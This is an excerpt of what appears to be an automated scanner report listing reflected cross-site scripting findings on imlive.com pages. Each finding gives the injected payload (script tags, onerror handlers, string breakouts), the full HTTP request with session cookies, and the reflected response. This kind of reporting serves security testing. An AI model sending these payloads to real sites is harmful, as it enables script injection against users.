<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||84ff7"><script>alert(1)</script>e0815795bf3~1');return false;"> ...[SNIP]...
2.43. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b12e'-alert(1)-'11d097f86af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2b12e'-alert(1)-'11d097f86af=1 HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81248"><script>alert(1)</script>dd3960e35d8 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 855e3"><script>alert(1)</script>7145c8255ab was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=855e3"><script>alert(1)</script>7145c8255ab&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2d7c5'onerror%3d'alert(1)'1cb395fc54c was submitted in the gotopage parameter. This input was echoed as 2d7c5'onerror='alert(1)'1cb395fc54c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2d7c5'onerror%3d'alert(1)'1cb395fc54c HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:30 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQRQRCTC=GAOPGJMAIPBIPMLIPIDNAHJF; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:31 GMT Connection: close Content-Length: 8306 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1c5"><script>alert(1)</script>6962831ce28 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; spvdr=vd=0363af80-a596-4403-b86a-074c2d206882&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=jpdip0zu5onkob3b3yj0jba1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55833e1c5"><script>alert(1)</script>6962831ce28&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.48. http://imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17713'-alert(1)-'0edf03efbd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?17713'-alert(1)-'0edf03efbd6=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/homepage.aspx&he=imlive.com&ul=/?17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&qs=17713'-alert(1)-'0edf03efbd6=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
2.49. http://imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c04"><a>b9169bf5b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?99c04"><a>b9169bf5b73=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 652a8'onerror%3d'alert(1)'f61ce20483c was submitted in the REST URL parameter 1. This input was echoed as 652a8'onerror='alert(1)'f61ce20483c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /652a8'onerror%3d'alert(1)'f61ce20483c HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:56 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:56 GMT Connection: close Content-Length: 8302 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.51. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/awardarena/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80d56'-alert(1)-'698666eeaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /awardarena/?80d56'-alert(1)-'698666eeaa0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:57 GMT Connection: close Content-Length: 25371 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostawards.aspx&he=imlive.com&ul=/awardarena/?80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&qs=80d56'-alert(1)-'698666eeaa0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
2.52. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/awardarena/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ece"><a>e6c79bedc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /awardarena/?c9ece"><a>e6c79bedc05=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:54 GMT Connection: close Content-Length: 25222 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/awardarena/?c9ece"><a>e6c79bedc05=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47df2'onerror%3d'alert(1)'f893addb900 was submitted in the REST URL parameter 1. This input was echoed as 47df2'onerror='alert(1)'f893addb900 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /47df2'onerror%3d'alert(1)'f893addb900 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:12 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:11 GMT Connection: close Content-Length: 19702 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.54. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/become_host.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c68'-alert(1)-'911a666a53f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /become_host.asp?15c68'-alert(1)-'911a666a53f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:27 GMT Connection: close Content-Length: 21781 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&qs=15c68'-alert(1)-'911a666a53f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
2.55. http://imlive.com/become_host.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/become_host.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8175d"><a>ad0c10fb84f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
